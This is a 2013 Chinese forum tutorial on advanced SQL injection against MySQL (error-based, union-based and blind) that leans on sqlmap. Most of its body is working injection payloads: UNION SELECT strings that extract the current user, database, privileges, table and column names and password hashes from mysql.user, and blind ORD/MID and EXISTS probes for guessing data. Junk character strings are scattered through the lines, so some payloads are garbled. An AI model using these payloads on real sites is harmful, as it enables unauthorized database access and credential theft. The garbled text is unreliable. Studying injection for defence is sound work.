放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。5 R) a0 L! c: g! U7 U$ U
3 i" J6 b" w! ]& i: c7 \# R
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表$ ]5 ^9 J4 Z# P! Q, f" ]& P1 g
4 B. R, d9 j+ Y/ z# s, ~: @, Y) v
分类标准 分类 备注 G; h3 K, w! z* `
按字段类型 整型注入,字符型注入 5 u1 {% F, d2 X/ q8 [4 m+ Y/ y, I
按出现的位置 get注入,post注入,cookie注入,http header注入 # I: |' f2 G* c; a" z2 }7 K
然而高级注入是这样的
$ T" L. O" q( U4 D 9 U2 \ n$ ]6 _# |6 k; e
高级注入分类 条件
0 F( q( j7 Z0 d: b4 n' [& q9 Uerror-based sql 数据库的错误回显可以返回,存在数据库,表结构
1 d. x. y3 |% q: w% ]% G$ z7 }union-based sql 能够使用union,存在数据库,表结构& Q' i. J' i$ n) X$ s
blind sql 存在注入
} A/ e; S9 `# V; d. J$ W我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
1 R2 x2 e8 T5 M- S) A
6 e+ [ L7 N+ s好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火 b* o" X; r0 h& P- q. K
" \6 ^& t' e8 ?: [0 l' A5 [
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
' E4 l+ I8 f1 O2 M2 ]2 k- b: H% H . t& k: k, R# q# a A9 w! Y7 ^
这里用mysql说明" ~$ x6 J* k" a* c" A9 u/ v
# `4 W6 A) L, K' ]e注入坛子里很多了,请看戳我或者再戳我
h. F; y: g( J; _( B% n
, K" O" ]6 @) `" j2 |$ Gu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
" i1 B* I2 N0 T3 f: Z ?; Q$ b ' ^$ v8 N4 ]8 e0 H) Z5 f8 j3 }
获取当前数据库用户名
: T0 H, u/ d, _* n
4 d5 J3 o% y+ E; ]1 ^. HUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C; Z, {7 v' [, q0 t4 \9 v: k
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
; r: G7 _+ `. \1 ^: \; G- }L, NULL#5 u' V/ J+ ^1 F9 Z! O- o
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。+ ~% F7 Q! k A8 O* U9 m2 W& L# t# @+ Q% j! j
6 {4 ~% c! j) B ~" I获取数据库名
3 b) J& }5 }% x6 @ i9 U$ \3 _
" N, Q! q8 z+ b8 `$ wUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#* f- Q" E. ~4 J$ B. ` p8 ~: j: l
获取所有用户名
- Q N1 q- O% U( w' d: Z
) M" {4 Q+ i) N, p4 N( SUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
9 A, }8 H2 a- Y9 w1 Z查看当前用户权限
2 A1 ~ L- P" k 5 O* c0 y" Z$ v N5 H9 K. f
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
0 a/ Q1 E' X4 o5 r/ w尝试获取密码,当然需要有能读mysql数据库的权限
% c$ }( t" T2 R. M+ p8 Z
0 F$ `7 s- Q" i7 i* bUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#. H$ g$ t) t; ^9 m
获取表名,limit什么的自己搞啦& l$ H% q/ Q& \/ `' @4 u% I# J* g
9 Q0 u7 V5 U+ B
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
6 z- u6 V$ ?* w( o" W获取字段名及其类型, Z# [' L" S: b# p3 Z3 b5 ]
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
) E1 p2 }7 T" i7 O7 M( I' L
" h* _, J( Z! v$ L) b; x( xb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
% t$ T' s# ^1 r$ {/ P% z) }: ` 5 w- M4 |9 x/ s' x, |2 U
如:
) t6 c$ C$ h8 Y6 g获取当前用户名 e: p4 S }; m. U; a& p8 F5 V
9 T7 ?8 B1 ]. d* g" s' W: F: XAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 1162 }3 v( c9 c7 B; D5 b. N2 f( ~
获取当前数据库
0 j' M. f {( y3 O3 @: W1 O : I A$ h8 C5 G9 e0 N( E
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
9 y1 [/ E! D0 v获取表名
% s* @" Z/ M) V6 I0 n( T
1 e7 Y" Y9 |& F6 s9 G9 Y9 T# l& g# KAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51) z; N6 J; H4 ~: n$ H3 T
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
( g% H! A& k) a* M; Z回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。7 G( G. a2 `& H) y0 S+ G+ N( ~9 e
爆表
: A2 R; B" v* J7 v
7 X3 [# r* q% n7 n/ i2 lAND EXISTS(select * from table)1 P$ T( l/ z% ]
爆字段% N5 V8 Q0 ?! Y1 j" d; q5 D/ G7 B* D
7 W7 v8 i$ S9 N
AND EXISTS(select pwd from table)
/ l: ` t8 o2 _* s% n1 a4 H盲注的变化就比较多了,由于篇幅,只是举个例子而已。
# x/ j3 y3 o# i + C% G. g. R# w" v+ A) V5 k: q4 I' h
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。2 ], Q( s# ?% A8 g
|
发表于 2013-7-16 20:31:26
收藏
支持
反对